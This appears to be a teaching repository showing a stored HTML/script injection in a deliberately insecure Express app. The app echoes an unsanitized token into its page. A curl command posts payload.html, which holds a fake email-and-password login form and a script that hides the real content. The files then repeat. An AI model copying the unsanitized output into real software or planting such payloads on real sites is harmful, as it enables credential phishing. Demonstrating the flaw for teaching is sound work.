chrisparnin/README.md

## README.md

      
    Raw
  

              README.md
            
          
    Vulnerability

The application allows for unsanitized data from a user to be displayed on the page.
app.get('/', function (req, res) 
{
    res.send('<div id="share"><h1>Share a token with a friend!</h1><p>Alice shared:</p></div>' + token);
});
Exploit

Even a small opening can allow for a large injection onto your site.
# Load the html/css/js
PAYLOAD=$(cat payload.html)
# Send to service
curl localhost:3000/ -d "token=${PAYLOAD}"

The attack even will hide the old site content:
  <script>
    var element = document.getElementById('share');
    element.style = "visibility: hidden;"
  </script> 
Before:


After:


## index.js
const express = require('express')
const bodyParser = require('body-parser')

const app = express()
const port = 3000

let token = '';

// parse application/x-www-form-urlencoded
app.use(bodyParser.urlencoded({ extended: false }))
// parse application/json
// app.use(bodyParser.json())

app.get('/', function (req, res)
{
    res.send('<div id="share"><h1>Share a token with a friend!</h1><p>Alice shared:</p></div>' + token);
});

app.post('/', function (req, res)
{
    console.log(req.body);
    token = req.body.token;
    res.send('ok\n');
});

app.listen(port, () => console.log(`Example app listening on port ${port}!`))

## package.json
{
  "name": "insecure_node",
  "version": "1.0.0",
  "description": "",
  "main": "index.js",
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1"
  },
  "author": "",
  "license": "ISC",
  "dependencies": {
    "body-parser": "^1.18.3",
    "express": "^4.16.3"
  }
}

## payload.html

<div>
<style scoped>
@import url("https://fonts.googleapis.com/css?family=Raleway:400,400i,700");

* {
  margin: 0;
  padding: 0;
  box-sizing: border-box;
}

html, body {
  width: 100%;
  height: 100%;
}

body {
 background: #614385;  /* fallback for old browsers */
background: -webkit-linear-gradient(to right, #516395, #614385);  /* Chrome 10-25, Safari 5.1-6 */
background: linear-gradient(to right, #516395, #614385); /* W3C, IE 10+/ Edge, Firefox 16+, Chrome 26+, Opera 12+, Safari 7+ */
  font-family: 'Raleway', sans-serif;
  letter-spacing: 0.1em;
}

  .container {
    width: 400px;
    height: 400px;
    background: #EDEDED;
    position: absolute;
    margin: auto;
    top: 0;
    bottom: 0;
    left: 0;
    right: 0;
    border-radius: 10px;
    border-bottom: 1px solid rgba(255, 255, 255, 0.3);
    box-shadow: 2px 2px 20px rgba(0, 0, 0, 0.3);
  }

    .content-container {
      width: 95%;
      height: 100%;
      position: relative;
      margin: auto;
      display: flex;
      flex-direction: column;
      justify-content: center;
    }
        label {
          color: #E74C3C;
          text-transform: uppercase;
        }
        input {
          width: 100%;
          height: 30px;
          margin-bottom: 20px;
          background: none;
          color: #E74C3C;
          border: none;
          border-bottom: 1px solid #E74C3C;
          opacity: 0.5;
          transition: opacity 0.3s;
        }
        input:hover {
          opacity: 1;
        }
        input:focus {
          outline: none;
        }
      .frg-password {
        text-decoration: none;
        color: #E74C3C;
      }
      .frg-password:hover {
        color: black;
      }
      .frg-password:visited {
        color: #E74C3C;
      }
      .login {
        width: 100%;
        height: 30px;
        border: none;
        margin-bottom: 20px;
        border-radius: 25px;
        font-family: 'Raleway', sans-serif;
        letter-spacing: 0.2em;
        color: #E74C3C;
        transition: background 1s, color 1s;
      }
      .login:hover {
        background: #E74C3C;
        color: #ECF0F1;
        cursor: pointer;
      }
      .media {
        width: 100%;
        height: 30px;
        border: none;
        margin: 5px 0;
        border-radius: 25px;
        opacity: 0.8;
        transition: opacity 0.3s;
      }
      .media:hover {
        opacity: 1;
        cursor: pointer;
      }
      .fb {
        background: #3A5A98;
        color: white;
      }
      .g {
        background: #DC4437;
        color: white;
      }
      button:focus {
        outline: none;
      }
</style>
  <div class="container">
    <div class="content-container">
      <label for="email">E-mail</label><br>
      <input id="email" type="text" placeholder="example@hotmail.com" required>
      <label for="password">Password</label><br>
      <input id="password" type="password" placeholder="*****" pattern=".{3,10}" title="Password should be between 3 and 10 characters.">
      <a class="frg-password" href="#">Forgot password ?</a><br>
      <button class="login">LOGIN</button>
    </div>
  </div>
  <script>
    var element = document.getElementById('share');
    element.style = "visibility: hidden;"
  </script>
</div>
	const express = require('express')
	const bodyParser = require('body-parser')

	const app = express()
	const port = 3000

	let token = '';

	// parse application/x-www-form-urlencoded
	app.use(bodyParser.urlencoded({ extended: false }))
	// parse application/json
	// app.use(bodyParser.json())

	app.get('/', function (req, res)
	{
	res.send('<div id="share"><h1>Share a token with a friend!</h1><p>Alice shared:</p></div>' + token);
	});

	app.post('/', function (req, res)
	{
	console.log(req.body);
	token = req.body.token;
	res.send('ok\n');
	});

	app.listen(port, () => console.log(`Example app listening on port ${port}!`))
	{
	"name": "insecure_node",
	"version": "1.0.0",
	"description": "",
	"main": "index.js",
	"scripts": {
	"test": "echo \"Error: no test specified\" && exit 1"
	},
	"author": "",
	"license": "ISC",
	"dependencies": {
	"body-parser": "^1.18.3",
	"express": "^4.16.3"
	}
	}

	<div>
	<style scoped>
	@import url("https://fonts.googleapis.com/css?family=Raleway:400,400i,700");

	* {
	margin: 0;
	padding: 0;
	box-sizing: border-box;
	}

	html, body {
	width: 100%;
	height: 100%;
	}

	body {
	background: #614385; /* fallback for old browsers */
	background: -webkit-linear-gradient(to right, #516395, #614385); /* Chrome 10-25, Safari 5.1-6 */
	background: linear-gradient(to right, #516395, #614385); /* W3C, IE 10+/ Edge, Firefox 16+, Chrome 26+, Opera 12+, Safari 7+ */
	font-family: 'Raleway', sans-serif;
	letter-spacing: 0.1em;
	}

	.container {
	width: 400px;
	height: 400px;
	background: #EDEDED;
	position: absolute;
	margin: auto;
	top: 0;
	bottom: 0;
	left: 0;
	right: 0;
	border-radius: 10px;
	border-bottom: 1px solid rgba(255, 255, 255, 0.3);
	box-shadow: 2px 2px 20px rgba(0, 0, 0, 0.3);
	}

	.content-container {
	width: 95%;
	height: 100%;
	position: relative;
	margin: auto;
	display: flex;
	flex-direction: column;
	justify-content: center;
	}
	label {
	color: #E74C3C;
	text-transform: uppercase;
	}
	input {
	width: 100%;
	height: 30px;
	margin-bottom: 20px;
	background: none;
	color: #E74C3C;
	border: none;
	border-bottom: 1px solid #E74C3C;
	opacity: 0.5;
	transition: opacity 0.3s;
	}
	input:hover {
	opacity: 1;
	}
	input:focus {
	outline: none;
	}
	.frg-password {
	text-decoration: none;
	color: #E74C3C;
	}
	.frg-password:hover {
	color: black;
	}
	.frg-password:visited {
	color: #E74C3C;
	}
	.login {
	width: 100%;
	height: 30px;
	border: none;
	margin-bottom: 20px;
	border-radius: 25px;
	font-family: 'Raleway', sans-serif;
	letter-spacing: 0.2em;
	color: #E74C3C;
	transition: background 1s, color 1s;
	}
	.login:hover {
	background: #E74C3C;
	color: #ECF0F1;
	cursor: pointer;
	}
	.media {
	width: 100%;
	height: 30px;
	border: none;
	margin: 5px 0;
	border-radius: 25px;
	opacity: 0.8;
	transition: opacity 0.3s;
	}
	.media:hover {
	opacity: 1;
	cursor: pointer;
	}
	.fb {
	background: #3A5A98;
	color: white;
	}
	.g {
	background: #DC4437;
	color: white;
	}
	button:focus {
	outline: none;
	}
	</style>
	<div class="container">
	<div class="content-container">
	<label for="email">E-mail</label><br>
	<input id="email" type="text" placeholder="example@hotmail.com" required>
	<label for="password">Password</label><br>
	<input id="password" type="password" placeholder="*****" pattern=".{3,10}" title="Password should be between 3 and 10 characters.">
	<a class="frg-password" href="#">Forgot password ?</a><br>
	<button class="login">LOGIN</button>
	</div>
	</div>
	<script>
	var element = document.getElementById('share');
	element.style = "visibility: hidden;"
	</script>
	</div>